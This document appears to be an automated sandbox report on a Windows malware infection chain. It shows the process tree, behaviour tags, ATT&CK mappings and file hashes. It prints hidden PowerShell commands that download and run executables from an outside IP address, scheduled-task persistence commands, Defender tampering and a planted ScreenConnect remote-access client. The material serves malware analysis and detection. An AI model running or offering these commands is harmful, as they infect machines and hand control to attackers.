C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\b1X18.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\b1X18.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1n70A2.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1n70A2.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"5⤵
- Executes dropped EXE
PID:3564
-
-
C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"6⤵
- Executes dropped EXE
PID:1680
-
-
C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 9486⤵
- Program crash
PID:5044
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3188
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 9606⤵
- Program crash
PID:4064
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 9486⤵
- Program crash
PID:4956
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1768 -s 9646⤵
- Program crash
PID:2900
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4668
-
-
C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1508 -
C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
PID:968 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /tn apisysDirectx_11 /tr "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe" /st 12:55 /du 23:59 /sc daily /ri 1 /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2256
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:380 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\91b7d375130f294a\ScreenConnect.ClientSetup.msi"6⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:932
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5048
-
-
C:\Users\Admin\AppData\Local\Temp\1089158001\launcher.exe"C:\Users\Admin\AppData\Local\Temp\1089158001\launcher.exe"5⤵
- Executes dropped EXE
PID:4964 -
C:\Users\Admin\AppData\Local\Temp\onefile_4964_133845296872134893\launcher.exeC:\Users\Admin\AppData\Local\Temp\1089158001\launcher.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process C:\Users\Admin\AppData\Local\Temp\MyGameLauncher\game.exe -Verb runAs7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3404 -
C:\Users\Admin\AppData\Local\Temp\MyGameLauncher\game.exe"C:\Users\Admin\AppData\Local\Temp\MyGameLauncher\game.exe"8⤵
- Executes dropped EXE
PID:1376 -
C:\Users\Admin\AppData\Local\Temp\onefile_1376_133845296886822311\game.exeC:\Users\Admin\AppData\Local\Temp\MyGameLauncher\game.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
- Sets desktop wallpaper using registry
PID:6020 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "notepad.exe C:\Users\Admin\Desktop\IMPORTANT_FILE.txt"10⤵PID:5492
-
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Admin\Desktop\IMPORTANT_FILE.txt11⤵
- Opens file in notepad (likely ransom note)
PID:5544
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089175001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1089175001\amnew.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3916 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"6⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6072 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"7⤵
- Executes dropped EXE
PID:6012 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"8⤵
- Executes dropped EXE
PID:5348
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3720 -
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2200
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3720 -s 9648⤵
- Program crash
PID:5964
-
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"7⤵PID:2504
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"8⤵PID:4168
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"8⤵PID:1712
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"8⤵PID:5280
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 10608⤵
- Program crash
PID:5976
-
-
-
C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"7⤵PID:5900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089179101\078fa63d7b.exe"C:\Users\Admin\AppData\Local\Temp\1089179101\078fa63d7b.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3180 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn UzOoJma2oyV /tr "mshta C:\Users\Admin\AppData\Local\Temp\yZygZYyeS.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
PID:3196 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn UzOoJma2oyV /tr "mshta C:\Users\Admin\AppData\Local\Temp\yZygZYyeS.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2924
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\yZygZYyeS.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3824 -
C:\Users\Admin\AppData\Local\TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE"C:\Users\Admin\AppData\Local\TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE"8⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1188
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" "5⤵
- System Location Discovery: System Language Discovery
PID:5660 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" any_word6⤵
- System Location Discovery: System Language Discovery
PID:5724 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:5900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:4788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5280
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:3164 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:4592
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "mTesxma7ufw" /tr "mshta \"C:\Temp\ulD1NdmSc.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5900
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\ulD1NdmSc.hta"7⤵
- System Location Discovery: System Language Discovery
PID:5272 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;8⤵
- Command and Scripting Interpreter: PowerShell
PID:5528 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵PID:3676
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089191001\8f9ec9ef64.exe"C:\Users\Admin\AppData\Local\Temp\1089191001\8f9ec9ef64.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5216 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 16086⤵
- Program crash
PID:6012
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089192001\73ead8dd80.exe"C:\Users\Admin\AppData\Local\Temp\1089192001\73ead8dd80.exe"5⤵PID:5832
-
-
C:\Users\Admin\AppData\Local\Temp\1089193001\sQ3DZPU.exe"C:\Users\Admin\AppData\Local\Temp\1089193001\sQ3DZPU.exe"5⤵PID:5152
-
-
C:\Users\Admin\AppData\Local\Temp\1089194001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1089194001\NL58452.exe"5⤵PID:964
-
C:\Users\Admin\AppData\Local\Temp\1089194001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1089194001\NL58452.exe"6⤵PID:4388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 9606⤵
- Program crash
PID:1152
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2O4054.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2O4054.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2364
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z15F.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z15F.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:432
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2492 -ip 24921⤵PID:3588
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 932 -ip 9321⤵PID:348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1732 -ip 17321⤵PID:624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1768 -ip 17681⤵PID:4768
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3628
-
C:\ProgramData\fedpc\snihdww.exeC:\ProgramData\fedpc\snihdww.exe start21⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3432
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4192 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C70ADF4F12C09606D86FB8903CE0999E C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4496 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIE0A7.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240705953 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1732
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:2680
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 656A2EA757736C2CA8F58DEEB20973C22⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2772
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6BEF943AF2DB1015B95C901FC33C7C7A E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3944
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:3144
-
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fv-dev.innocreed.com&p=8041&s=1d4ae042-a21b-414a-89b9-8ff89d22e106&k=BgIAAACkAABSU0ExAAgAAAEAAQD5wtPOV3jCKFBLBsJ%2bV2IvGNdB3BTw3%2f7f3qmPmpEeYSXd1jGOatzoch6LU%2fh7cgGu%2bCj4f65wOx8AqDxICfj1AlxsHvMXD0ReOH62PLLSTPTukKm5RrhhJDxk4MmWP%2byBb46HAlkpjuwiGPts8qrBKMb47tVBoGNwLhbutjkbQNksjhMQH1AWAWUktJQ85d0L163Ahixe3xI7cGngG1%2baQm5IzZ3UPJpZ%2b9SN8gb89xLov6PdHVlnj%2bxe1Qvlapboi4ODTYPekRoAhHcR2A9cyIErFTA4j5R4TWoF8f3ZRb6IRobccYev2f%2b8vM98GtEnWHEzuZHxGcRJ5afFuG3P&c=prequest&c=&c=&c=&c=&c=&c=&c="1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4004 -
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "629235ea-3bc3-43b1-8aa7-af3861b0ba50" "User"2⤵
- Executes dropped EXE
PID:4944
-
-
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "0d90b3a2-ff69-4c24-8307-3a8aaa1a76dc" "System"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:712
-
-
C:\ProgramData\apisysDirectx_11\apisysDirectx.exeC:\ProgramData\apisysDirectx_11\apisysDirectx.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5684
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5696
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵
- Executes dropped EXE
PID:4204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3720 -ip 37201⤵PID:1356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2504 -ip 25041⤵PID:2700
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5216 -ip 52161⤵PID:5144
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 964 -ip 9641⤵PID:4472
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
8Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
214KB
MD5f41076c490192649ea96b2bafa06c210
SHA1e1c2bad1f7015325af853e3a671c4193acc740be
SHA2567297c91406b791f582bef3c21496169569030f5635736c73d9a719712e58cffd
SHA512a87fd52d4213c024c8e93139c50032ff14c4c04f1460d652dc40df40224a3b8db5cbbe32885daf53b8eeed85459027ada3c3f411e5d3b5ab916d1d745b3ce0de
-
Filesize
66KB
MD55db908c12d6e768081bced0e165e36f8
SHA1f2d3160f15cfd0989091249a61132a369e44dea4
SHA256fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca
SHA5128400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d
-
Filesize
93KB
MD575b21d04c69128a7230a0998086b61aa
SHA1244bd68a722cfe41d1f515f5e40c3742be2b3d1d
SHA256f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e
SHA5128d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2
-
Filesize
1.7MB
MD5bbb58aab0d638e5947e3a2b6cb2f2147
SHA17c425653f7f88ca3d992229264ecdea2ed6282ed
SHA256678f98e3e22c514315e70b59d7b1decf32f8238915514b9b6d3ab8bcc2391d59
SHA5122b7db840e04db2a293cdc11a08eb84ce728232ceadf34fb050e84b8934e6a9c5140dcfaa11f6a667d3ae17767c971c735b8f0c2e50f69e5fd8c4b37299bc0a45
-
Filesize
19.4MB
MD5f70d82388840543cad588967897e5802
SHA1cd21b0b36071397032a181d770acd811fd593e6e
SHA2561be1102a35feb821793dd317c1d61957d95475eab0a9fdc2232f3a3052623e35
SHA5123d144eee4a770b5c625e7b5216c20d3d37942a29e08560f4ebf2c36c703831fd18784cd53f3a4a2f91148ec852454ac84fc0eb7f579bb9d11690a2978eb6eef6
-
Filesize
350KB
MD5a8ead31687926172939f6c1f40b6cc31
SHA12f91f75dbdef8820146ceb6470634ab1ffb7b156
SHA25684aad76d2d1ac2179ea160565a28fc850ee125ff74c3aeb1754d20d8c9ed870c
SHA512a0082f833c6858208f04a62b03088873baac303203f758e458a1a067572ffe9785edb30dd075acbfc1431272f56a1b1be168ef29f6db0a7ee55578dc712fa387
-
Filesize
345KB
MD53987c20fe280784090e2d464dd8bb61a
SHA122427e284b6d6473bacb7bc09f155ef2f763009c
SHA256e9af37031ed124a76401405412fe2348dad28687ac8f25bf8a992299152bd6d9
SHA5125419469496f663cedcfa4acc6d13018a8ee957a43ff53f6ffa5d30483480838e4873ff64d8879996a32d93c11e727f0dded16ca04ab2e942ed5376ba29b10018
-
Filesize
348KB
MD5ce869420036665a228c86599361f0423
SHA18732dfe486f5a7daa4aedda48a3eb134bc2f35c0
SHA256eb04f77eb4f92dd2b46d04408166a32505e5016435ccd84476f20eeba542dafd
SHA51266f47f62ce2c0b49c6effcd152e49360b5fa4667f0db74bff7ff723f6e4bfc4df305ae249fad06feeaad57df14ee9919b7dcc04f7a55bb4b07e96406ed14319e
-
Filesize
8.1MB
MD5bda77456ba54bf5c2f82c043e0b2d343
SHA1cf3402d6b7da39a5977fe9c6fd1abd847afe6bfc
SHA256c2c6d8a1b1a1d40ebad4bcd4bee3a1718d1edce34983d56b7e7f00e207b4004c
